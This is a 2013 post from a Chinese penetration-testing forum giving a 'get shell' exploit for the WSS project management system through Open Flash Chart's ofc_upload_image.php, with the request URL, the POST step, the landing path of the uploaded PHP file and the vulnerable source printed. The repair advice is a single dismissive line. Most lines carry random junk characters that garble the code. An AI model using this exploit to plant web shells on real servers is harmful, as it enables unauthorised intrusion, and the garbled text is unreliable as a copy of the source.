中国网络渗透测试联盟

标题: WSS项目管理系统Post get shell [打印本页]
作者: admin    时间: 2013-2-23 12:38
标题: WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存2 T5 @* S/ r5 t( `9 v
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
/ E9 \! s" x' h  b) j
6 e8 ]1 Y. N  I1 v9 H, `% x2 h利用:
' h% o5 D- Q8 H/ j/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
) M* w( U: @) C; {
( X, ~: l* I! r% M5 @% bPost任意数据
9 P# B3 C5 ~9 O保存位置http://localhost/chart/tmp-upload-images/hfy.php
5 d4 l! o9 n! m- e: [& B% O[attach]201[/attach]
  G, Q8 |/ a$ Q" l# b[attach]202[/attach]
) W" Y* Q# P/ o+ W最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
* N7 ^" `$ C! @7 |4 a  T. Q5 b& c! y
<?php) {) g" P6 E3 V( \5 u& O! U

' w0 B+ C4 I6 S+ U! w6 y* n- f//7 ]- i. q: e" P% c! l6 m4 h6 Z
// In Open Flash Chart -> save_image debug mode, you8 S! v7 v# H4 P# h, t
// will see the 'echo' text in a new window.
* G; l( W1 k  G' c/ J" B//, x) n5 }/ y% t

. ^' T5 {. |7 j& ]+ e/*0 i/ K" u4 K8 k* ~
' K: ~: D! w+ f0 ]. A
print_r( $_GET );
: M) r& K) i+ y( iprint_r( $_POST );3 g0 s( ]" e% }/ U
print_r( $_FILES );
6 D8 Y' I6 o0 `6 b4 Q
! T0 o- h% Z4 bprint_r( $GLOBALS );( y1 ^) S5 J7 {/ H3 u0 G
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
4 N5 g& L2 ]0 {( T9 P) E, J) x4 v/ o, E) x: X! z+ m% i. d, G" T
*/2 s! i3 b8 l" G. v: t; R3 [
// default path for the image to be stored //
0 i- o. ?, O2 Q$default_path = '../tmp-upload-images/';. D2 V9 K$ M% M0 Q' U  @

! O" b1 ^% L0 @if (!file_exists($default_path)) mkdir($default_path, 0777, true);. [, b  }8 @: a
/ ]; l" h" I- [0 T! E# ^
// full path to the saved image including filename //
7 n! a" a/ ]# n, c" e/ r$destination = $default_path . basename( $_GET[ 'name' ] );
* Y( A1 p$ K- V2 ~, f3 L0 b
, t% c6 {9 L0 z4 m  _) `echo 'Saving your image to: '. $destination;" I& m% {1 K/ ~  C0 z
// print_r( $_POST );
' {5 E* P$ W$ k  o7 i; Y. d// print_r( $_SERVER );# F+ p9 E& P" L; s2 C: ~
// echo $HTTP_RAW_POST_DATA;
' D( R9 K* i0 E: r% T7 t" I( F2 N6 S4 `4 L. ^) C  ]8 c
//
% S( T" U( M8 j* Q; x. [# Z1 M: _  e+ l// POST data is usually string data, but we are passing a RAW .png/ w/ x" Y  C  z$ A! _
// so PHP is a bit confused and $_POST is empty. But it has saved4 ^4 W  R/ X% C
// the raw bits into $HTTP_RAW_POST_DATA
7 a3 |& e: u" y; n5 m//; v0 A. u  f& t' T6 v- o% m1 y, n

& e' d4 }9 X  |, ^. ~# v$jfh = fopen($destination, 'w') or die("can't open file");
+ n6 U: a5 ~) m; D- {& @6 Q; W5 H2 X8 ifwrite($jfh, $HTTP_RAW_POST_DATA);$ e% M) `7 j' y( f+ q0 b
fclose($jfh);( I8 s, S- i+ @% [' n

# P& ~8 D& L& c//
( b! K& i" @$ ]// LOOK:
/ e$ r; m" V1 ]//3 o' h: C9 Z) q2 @  g/ V
exit();
! r1 w: x. g( k  Q//! u( j/ p) P  f: b+ S0 q" ?+ f
// PHP5:, U1 V! M' t) ]' ~7 c3 _& y
//
$ ^- Y8 k" C1 g0 f, j+ ?# {! Q  w! H- e- O

; v# G9 ^6 f, k% T! _. h- j: o9 g// default path for the image to be stored //; S0 c* _- f5 q8 m$ B) d
$default_path = 'tmp-upload-images/';2 E8 J) C8 s6 F- i

' l: i3 x1 q- [2 X, vif (!file_exists($default_path)) mkdir($default_path, 0777, true);
8 a0 L8 Q/ ~8 M' R' y8 t7 I8 R9 k# C0 J* G
// full path to the saved image including filename //
% Z# s7 N$ g, m: f$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
5 K; X" [" Z: T! ?0 a+ p3 S
% Y$ j- ]! N/ J7 z// move the image into the specified directory //5 l! g' T+ e- u9 s) b7 X& y
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {0 F) I; G6 T/ k) K2 _+ l! f+ t$ V
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
) A% X4 b" V1 z$ M5 B} else {
( n4 r8 n; R/ Z9 h    echo "FILE UPLOAD FAILED";) f; [2 U) w* d2 @' _. ?
}
0 f% `' n6 B( s  _4 H$ L
- a; O7 \- ?( F6 e% ?' |6 F* a* ?9 b) y
?>3 x- f1 D) x, l3 u& i! }3 Z

$ p. q, w/ r, Y8 i% k$ e5 x; ?6 J" n4 g: v
+ z( M. x3 {! k" o, R1 o! P3 X* D# Q
6 n4 i5 Y% g. N% W
[attach]203[/attach]
& c! N; l+ [1 z, q2 {( F# N' m* ^, c% }: G
修复方案:
% ?. t) u2 @9 n( n, l4 h这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 1 w6 x2 C) l$ R. E& |0 a9 D  G8 S7 h

+ G6 W) V+ \; `$ E
; ?0 z2 E/ {0 ]0 m3 E- c% L
( b/ F0 y/ G3 D% k& y9 ?, r+ j. y/ c4 ]" d# @




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2